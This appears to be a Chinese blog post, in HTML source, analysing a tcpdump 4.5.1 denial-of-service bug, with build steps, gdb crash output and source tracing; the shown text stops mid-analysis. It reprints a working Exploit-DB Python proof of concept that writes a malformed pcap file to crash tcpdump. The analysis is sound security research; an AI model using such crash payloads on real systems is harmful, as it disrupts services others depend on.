<!DOCTYPE html>
< html class = "theme-next muse use-motion" lang = "zh-Hans" >
< head > < meta name = "generator" content = "Hexo 3.8.0" >
< meta charset = "UTF-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, maximum-scale=1" >
< meta name = "theme-color" content = "#222" >
< script src = "/lib/pace/pace.min.js?v=1.0.2" > < / script >
< link href = "/lib/pace/pace-theme-center-atom.min.css?v=1.0.2" rel = "stylesheet" >
< meta http-equiv = "Cache-Control" content = "no-transform" >
< meta http-equiv = "Cache-Control" content = "no-siteapp" >
< link href = "/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel = "stylesheet" type = "text/css" >
< link href = "/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel = "stylesheet" type = "text/css" >
< link href = "/css/main.css?v=5.1.4" rel = "stylesheet" type = "text/css" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "mask-icon" href = "/images/logo.svg?v=5.1.4" color = "#222" >
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击" >
< meta name = "description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" >
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击" >
< meta property = "og:type" content = "article" >
< meta property = "og:title" content = "TCPDUMP拒绝服务攻击漏洞" >
< meta property = "og:url" content = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html" >
< meta property = "og:site_name" content = "混元霹雳手" >
< meta property = "og:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" >
< meta property = "og:locale" content = "zh-Hans" >
< meta property = "og:updated_time" content = "2021-04-10T13:48:18.517Z" >
< meta name = "twitter:card" content = "summary" >
< meta name = "twitter:title" content = "TCPDUMP拒绝服务攻击漏洞" >
< meta name = "twitter:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" >
< script type = "text/javascript" id = "hexo.configurations" >
// Page-level configuration for the NexT theme, emitted by Hexo (the
// generator meta tag names Hexo 3.8.0; the theme version below is 5.1.4).
// `NexT` is kept if an earlier script already created it; `CONFIG` is plain
// data — nothing here executes beyond building the two objects.
var NexT = window.NexT || {};

var CONFIG = {
  "root": "/",
  "scheme": "Muse",
  "version": "5.1.4",
  // Sidebar placement/visibility options.
  "sidebar": {
    "position": "left",
    "display": "always",
    "offset": 12,
    "b2t": false,
    "scrollpercent": true,
    "onmobile": false
  },
  "fancybox": true,
  "tabs": true,
  // Entry animation names per page region.
  "motion": {
    "enable": true,
    "async": false,
    "transition": {
      "post_block": "fadeIn",
      "post_header": "slideDownIn",
      "post_body": "slideDownIn",
      "coll_header": "slideLeftIn",
      "sidebar": "slideUpIn"
    }
  },
  // Duoshuo settings (presumably a comment widget; not referenced elsewhere in this chunk).
  "duoshuo": {
    "userId": "0",
    "author": "博主"
  },
  // Algolia search: all credentials are empty strings on this page, so the
  // search UI presumably stays inactive; no secret is exposed here.
  "algolia": {
    "applicationID": "",
    "apiKey": "",
    "indexName": "",
    "hits": {"per_page": 10},
    "labels": {
      "input_placeholder": "Search for Posts",
      "hits_empty": "We didn't find any results for the search: ${query}",
      "hits_stats": "${hits} results found in ${time} ms"
    }
  }
};
< / script >
< link rel = "canonical" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
< title > TCPDUMP拒绝服务攻击漏洞 | 混元霹雳手< / title >
< / head >
< body itemscope itemtype = "http://schema.org/WebPage" lang = "zh-Hans" >
< div class = "container sidebar-position-left page-post-detail" >
< div class = "headband" > < / div >
< header id = "header" class = "header" itemscope itemtype = "http://schema.org/WPHeader" >
< div class = "header-inner" > < div class = "site-brand-wrapper" >
< div class = "site-meta " >
< div class = "custom-logo-site-title" >
< a href = "/" class = "brand" rel = "start" >
< span class = "logo-line-before" > < i > < / i > < / span >
< span class = "site-title" > 混元霹雳手< / span >
< span class = "logo-line-after" > < i > < / i > < / span >
< / a >
< / div >
< p class = "site-subtitle" > < / p >
< / div >
< div class = "site-nav-toggle" >
< button >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< / button >
< / div >
< / div >
< nav class = "site-nav" >
< ul id = "menu" class = "menu" >
< li class = "menu-item menu-item-home" >
< a href = "/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-home" > < / i > < br >
首页
< / a >
< / li >
< li class = "menu-item menu-item-about" >
< a href = "/about/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-user" > < / i > < br >
关于
< / a >
< / li >
< li class = "menu-item menu-item-tags" >
< a href = "/tags/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-tags" > < / i > < br >
标签
< / a >
< / li >
< li class = "menu-item menu-item-categories" >
< a href = "/categories/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-th" > < / i > < br >
分类
< / a >
< / li >
< li class = "menu-item menu-item-archives" >
< a href = "/archives/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-archive" > < / i > < br >
归档
< / a >
< / li >
< li class = "menu-item menu-item-bookmarks" >
< a href = "/bookmarks/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-map" > < / i > < br >
书签
< / a >
< / li >
< li class = "menu-item menu-item-hack之外" >
< a href = "/hack之外/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-heartbeat" > < / i > < br >
HACK之外
< / a >
< / li >
< / ul >
< / nav >
< / div >
< / header >
< main id = "main" class = "main" >
< div class = "main-inner" >
< div class = "content-wrap" >
< div id = "content" class = "content" >
< div id = "posts" class = "posts-expand" >
< article class = "post post-type-normal" itemscope itemtype = "http://schema.org/Article" >
< div class = "post-block" >
< link itemprop = "mainEntityOfPage" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
< span hidden itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< meta itemprop = "name" content = "Cool-Y" >
< meta itemprop = "description" content >
< meta itemprop = "image" content = "/images/avatar.png" >
< / span >
< span hidden itemprop = "publisher" itemscope itemtype = "http://schema.org/Organization" >
< meta itemprop = "name" content = "混元霹雳手" >
< / span >
< header class = "post-header" >
< h1 class = "post-title" itemprop = "name headline" > TCPDUMP拒绝服务攻击漏洞< / h1 >
< div class = "post-meta" >
< span class = "post-time" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-calendar-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 发表于< / span >
< time title = "创建于" itemprop = "dateCreated datePublished" datetime = "2018-12-25T12:26:05+08:00" >
2018-12-25
< / time >
< / span >
< span class = "post-category" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-folder-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 分类于< / span >
< span itemprop = "about" itemscope itemtype = "http://schema.org/Thing" >
< a href = "/categories/二进制/" itemprop = "url" rel = "index" >
< span itemprop = "name" > 二进制< / span >
< / a >
< / span >
< / span >
< span id = "/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" class = "leancloud_visitors" data-flag-title = "TCPDUMP拒绝服务攻击漏洞" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-eye" > < / i >
< / span >
< span class = "post-meta-item-text" > 阅读次数: < / span >
< span class = "leancloud-visitors-count" > < / span >
< / span >
< div class = "post-wordcount" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-file-word-o" > < / i >
< / span >
< span title = "字数统计" >
3.4k 字
< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-clock-o" > < / i >
< / span >
< span title = "阅读时长" >
16 分钟
< / span >
< / div >
< div class = "post-description" >
TCPDUMP 4.5.1 拒绝服务攻击漏洞分析
< / div >
< / div >
< / header >
< div class = "post-body" itemprop = "articleBody" >
< h2 id = "Tcpdump介绍" > < a href = "#Tcpdump介绍" class = "headerlink" title = "Tcpdump介绍" > < / a > Tcpdump介绍< / h2 > < ol >
< li > tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump; 它需要WinPcap驱动, 相当于在Linux平台下的libpcap.< / li >
< li > tcpdump能够分析网络行为, 性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤, 并提供and、or、not等逻辑语句来帮助你去掉无用的信息, 从而使用户能够进一步找出问题的根源。< / li >
< li > 也可以使用 tcpdump 实现特定目的, 例如在路由器和网关之间拦截并显示其他用户或计算机的通信。通过 tcpdump 分析非加密的流量, 如Telnet或HTTP的数据包, 可以查看登录的用户名、密码、网址、正在浏览的网站内容, 或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁, 而是对网络上的其他计算机的安全存在威胁。不过, 正如本文分析的漏洞所示, tcpdump 在解析不可信的pcap文件或抓取到的数据包时, 其自身的协议解析代码同样可能成为攻击面。< / li >
< / ol >
< h2 id = "分析环境" > < a href = "#分析环境" class = "headerlink" title = "分析环境" > < / a > 分析环境< / h2 > < ul >
< li > Ubuntu 16.04.4 LTS i686< / li >
< li > tcpdump 4.5.1< / li >
< li > gdb with peda< / li >
< / ul >
< h2 id = "漏洞复现" > < a href = "#漏洞复现" class = "headerlink" title = "漏洞复现" > < / a > 漏洞复现< / h2 > < p > 这个漏洞触发的原因是, tcpdump在处理特殊的pcap包的时候, 由于对数据包传输数据长度没有进行严格的控制, 导致在连续读取数据包中内容超过一定长度后, 会读取到无效的内存空间, 从而导致拒绝服务的发生。对于这个漏洞, 首先要对pcap包的结构进行一定的分析, 才能够最后分析出漏洞的成因, 下面对这个漏洞进行复现。< / p >
< h3 id = "编译安装tcpdump" > < a href = "#编译安装tcpdump" class = "headerlink" title = "编译安装tcpdump" > < / a > 编译安装tcpdump< / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. # apt-get install libpcap-dev< / span > < br > < span class = "line" > 2. # dpkg -l libpcap-dev< / span > < br > < span class = "line" > 3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 5. # cd tcpdump-4.5.1/< / span > < br > < span class = "line" > 6. # ./configure< / span > < br > < span class = "line" > 7. # make< / span > < br > < span class = "line" > 8. # make install< / span > < br > < span class = "line" > 9. # tcpdump --version< / span > < br > < span class = "line" > tcpdump version 4.5.1< / span > < br > < span class = "line" > libpcap version 1.7.4< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h3 id = "生成payload( 来自exploit-db-payload) " > < a href = "#生成payload( 来自exploit-db-payload) " class = "headerlink" title = "生成payload( 来自exploit-db payload) " > < / a > 生成payload( 来自exploit-db payload) < / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > # Exploit Title: tcpdump 4.5.1 Access Violation Crash< / span > < br > < span class = "line" > # Date: 31st May 2016< / span > < br > < span 
class = "line" > # Exploit Author: David Silveiro< / span > < br > < span class = "line" > # Vendor Homepage: http://www.tcpdump.org< / span > < br > < span class = "line" > # Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > # Version: 4.5.1< / span > < br > < span class = "line" > # Tested on: Ubuntu 14 LTS< / span > < br > < span class = "line" > from subprocess import call< / span > < br > < span class = "line" > from shlex import split< / span > < br > < span class = "line" > from time import sleep< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > def crash():< / span > < br > < span class = "line" > command = ' tcpdump -r crash' < / span > < br > < span class = "line" > buffer = ' \xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x00\x08\x00\x00\x00\x00< \x9c7@\xff\x00' < / span > < br > < span class = "line" > buffer += ' \x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a' < / span > < br > < span class = "line" > buffer += " \x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0& \x80\x18\' " < / span > < br > < span class = "line" > buffer += " xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n' , ' \x00\x00\x00\x00" < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x01\x03\x03\x04' < / span > < br > < span class = "line" > with open(' crash' , ' w+b' ) as file:< / span > < br > < span class = "line" > file.write(buffer)< / span > < br > < span class = "line" > try:< / span > < br > < span class = "line" > call(split(command))< / span > < br > < span class = "line" > print(" Exploit successful! " )< / span > < br > < span class = "line" > except:< / span > < br > < span class = "line" > print(" Error: Something has gone wrong!" 
)< / span > < br > < span class = "line" > def main():< / span > < br > < span class = "line" > print(" Author: David Silveiro " )< / span > < br > < span class = "line" > print(" tcpdump version 4.5.1 Access Violation Crash " )< / span > < br > < span class = "line" > sleep(2)< / span > < br > < span class = "line" > crash()< / span > < br > < span class = "line" > if __name__ == " __main__" :< / span > < br > < span class = "line" > main()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h2 id = "崩溃分析" > < a href = "#崩溃分析" class = "headerlink" title = "崩溃分析" > < / a > 崩溃分析< / h2 > < h3 id = "pcap包格式" > < a href = "#pcap包格式" class = "headerlink" title = "pcap包格式" > < / a > pcap包格式< / h3 > < p > 首先来分析一下pcap包的格式, 首先是pcap文件头的内容, 在.h有所定义, 这里将结构体以及对应变量含义都列出来。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > struct pcap_file_header { < / span > < br > < span class = "line" > bpf_u_int32 magic;< / span > < br > < span class = "line" > u_short version_major;< / span > < br > < span class = "line" > u_short version_minor;< / span > < br > < span class = "line" > bpf_int32 thiszone; /* gmt to local correction */< / span > < br > < span class = "line" > bpf_u_int32 sigfigs; /* accuracy of timestamps */< / span > < br > < span class = "line" > bpf_u_int32 snaplen; /* max length saved portion of each pkt */< / span > < br > < span class = "line" > bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */< / span > < br > < span class = "line" > } ;< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 看一下各字段的含义:< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > magic: 4字节 pcap文件标识 目前为“d4 c3 b2 a1”< / span > < br > < span class = "line" > major: 2字节 主版本号 #define PCAP_VERSION_MAJOR 2< / span > < br > < span class = "line" > minor: 2字节 次版本号 #define PCAP_VERSION_MINOR 4< / span > < br > < span class = "line" > thiszone: 4字节 时区修正 并未使用, 目前全为0< / span > < br > < span class = "line" > sigfigs: 4字节 精确时间戳 并未使用, 目前全为0< / span > < br > < span class = "line" > snaplen: 4字节 抓包最大长度 如果要抓全, 设为0x0000ffff( 65535) , < / span > < br > < span class = "line" > tcpdump -s 0就是设置这个参数, 缺省为68字节< / span > < br > < span class = "line" > linktype: 4字节 链路类型 一般都是1: ethernet< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > struct pcap_pkthdr { < / span > < br > < span class = "line" > struct timeval ts; /* time stamp */< / span > < br > < span class = "line" > bpf_u_int32 caplen; /* length of portion present */< / span > < br > < span class = 
"line" > bpf_u_int32 len; /* length this packet (off wire) */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > struct timeval { < / span > < br > < span class = "line" > long tv_sec; /* seconds (XXX should be time_t) */< / span > < br > < span class = "line" > suseconds_t tv_usec; /* and microseconds */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > ts: 8字节 抓包时间 4字节表示秒数, 4字节表示微秒数< / span > < br > < span class = "line" > caplen: 4字节 保存下来的包长度( 最多是snaplen, 比如68字节) < / span > < br > < span class = "line" > len: 4字节 数据包的真实长度, 如果文件中保存的不是完整数据包, 可能比caplen大< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 其中len变量是值得关注的, 因为在crash文件中, 对应len变量的值为00 3C 9C 37< br > 这是一个很大的值, 按小端序读取出来就是0x379C3C00, 这个数非常大。实际上在wireshark中打开这个crash文件, 就会报错, 提示这个数据包的长度已经超过了范围, 而换算出来的长度就是0x379C3C00, 这是触发漏洞的关键。< / p >
< h3 id = "gdb调试" > < a href = "#gdb调试" class = "headerlink" title = "gdb调试" > < / a > gdb调试< / h3 > < p > 首先通过gdb运行tcpdump, 用-r参数打开poc生成的crash, tcp崩溃, 到达漏洞触发位置< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. 
Program received signal SIGSEGV, Segmentation fault.< / span > < br > < span class = "line" > 2. [----------------------------------registers-----------------------------------]< / span > < br > < span class = "line" > 3. EAX: 0x1< / span > < br > < span class = "line" > 4. EBX: 0x81e33bd --> 0x0< / span > < br > < span class = "line" > 5. ECX: 0x2e (' .' )< / span > < br > < span class = "line" > 6. EDX: 0x0< / span > < br > < span class = "line" > 7. ESI: 0xbfffe201 (' .' < repeats 14 times> )< / span > < br > < span class = "line" > 8. EDI: 0xbfffe1db --> 0x30303000 (' ' )< / span > < br > < span class = "line" > 9. EBP: 0x10621< / span > < br > < span class = "line" > 10. ESP: 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 11. EIP: 0x8053c6a (< hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1])< / span > < br > < span class = "line" > 12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)< / span > < br > < span class = "line" > 13. [-------------------------------------code-------------------------------------]< / span > < br > < span class = "line" > 14. 0x8053c5d < hex_and_ascii_print_with_offset+93> : je 0x8053d40 < hex_and_ascii_print_with_offset+320> < / span > < br > < span class = "line" > 15. 0x8053c63 < hex_and_ascii_print_with_offset+99> : mov ebx,DWORD PTR [esp+0x18]< / span > < br > < span class = "line" > 16. 0x8053c67 < hex_and_ascii_print_with_offset+103> : sub esp,0x4< / span > < br > < span class = "line" > 17. => 0x8053c6a < hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1]< / span > < br > < span class = "line" > 18. 0x8053c6f < hex_and_ascii_print_with_offset+111> : movzx ecx,BYTE PTR [ebx+ebp*2]< / span > < br > < span class = "line" > 19. 0x8053c73 < hex_and_ascii_print_with_offset+115> : push edx< / span > < br > < span class = "line" > 20. 
0x8053c74 < hex_and_ascii_print_with_offset+116> : mov ebx,edx< / span > < br > < span class = "line" > 21. 0x8053c76 < hex_and_ascii_print_with_offset+118> : mov DWORD PTR [esp+0x18],edx< / span > < br > < span class = "line" > 22. [------------------------------------stack-------------------------------------]< / span > < br > < span class = "line" > 23. 0000| 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 24. 0004| 0xbfffe1b0 --> 0xb7fff000 --> 0x23f3c< / span > < br > < span class = "line" > 25. 0008| 0xbfffe1b4 --> 0x1< / span > < br > < span class = "line" > 26. 0012| 0xbfffe1b8 --> 0x2f5967 (' gY/' )< / span > < br > < span class = "line" > 27. 0016| 0xbfffe1bc --&
< p > 从崩溃信息来看, 出错位置为s2 = *cp++;崩溃原因为SIGSEGV, 即进程执行了一段无效的内存引用或发生段错误。可以看到, 问题出现在./print-ascii.c:91, 而且此时指针读取[ebx+ebp*2+0x1]的内容, 可能是越界读取造成的崩溃。< br > 再结合源码信息可知, 指针cp在自加的过程中访问到了一个没有权限访问的地址, 因为这是写在一个while循环里, 也就是说nshorts的值偏大, 再看nshorts怎么来的, 由nshorts = length / sizeof(u_short);可知, 可能是函数传入的参数length没有控制大小导致, 因此目标就是追踪length是如何传入的。< br > 我们通过bt回溯一下调用情况。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. gdb-peda$ bt< / span > < br > < span class = "line" > 2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af " \n\t" , cp=0x8204000 < error: Cannot access memory at address 0x8204000> ,< / span > < br > < span class = "line" > 3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91< / span > < br > < span class = "line" > 4. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af " \n\t" , cp=0x81e33bd " " , length=0xfffffff3) at ./print-ascii.c:127< / span > < br > < span class = "line" > 5. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 < Gndo> , h=0xbfffe40c, p=< optimized out> ) at ./print-802_15_4.c:180< / span > < br > < span class = "line" > 6. #3 0x080a0aea in print_packet (user=0xbfffe4dc " \023\036\b\300\034\005\b\001" , h=0xbfffe40c, sp=0x81e33a8 " @\377" )< / span > < br > < span class = "line" > 7. at ./tcpdump.c:1950< / span > < br > < span class = "line" > 8. 
#4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 9. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 10. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569< / span > < br > < span class = "line" > 11. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 < main> , argc=0x3, argv=0xbffff6c4, init=0x80b1230 < __libc_csu_init> ,< / span > < br > < span class = "line" > 12. fini=0x80b1290 < __libc_csu_fini> , rtld_fini=0xb7fea880 < _dl_fini> , stack_end=0xbffff6bc) at ../csu/libc-start.c:291< / span > < br > < span class = "line" > 13. #8 0x0804c245 in _start ()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 函数调用流程< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > pcap_loop< / span > < br > < span class = "line" > |----print_packet< / span > < br > < span class = "line" > |-----hex_and_ascii_print< / span > < br > < span class = "line" > |-------- hex_and_ascii_print_with_offset< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 由此可见, 从main函数开始了一连串函数调用, git源码下来看看。< br > tcpdump.c找到pcap_loop调用< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. do { < / span > < br > < span class = "line" > 2. status = pcap_loop(pd, cnt, callback, pcap_userdata);< / span > < br > < span class = "line" > 3. if (WFileName == NULL) { < / span > < br > < span class = "line" > 4. /*< / span > < br > < span class = "line" > 5. * We' re printing packets. Flush the printed output,< / span > < br > < span class = "line" > 6. * so it doesn' t get intermingled with error output.< / span > < br > < span class = "line" > 7. */< / span > < br > < span class = "line" > 8. if (status == -2) { < / span > < br > < span class = "line" > 9. /*< / span > < br > < span class = "line" > 10. * We got interrupted, so perhaps we didn' t< / span > < br > < span class = "line" > 11. * manage to finish a line we were printing.< / span > < br > < span class = "line" > 12. * Print an extra newline, just in case.< / span > < br > < span class = "line" > 13. */< / span > < br > < span class = "line" > 14. putchar(' n' );< / span > < br > < span class = "line" > 15. 
} < / span > < br > < span class = "line" > 16. (void)fflush(stdout);< / span > < br > < span class = "line" > 17. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 设置断点之后查看一下该函数的执行结果< / p >
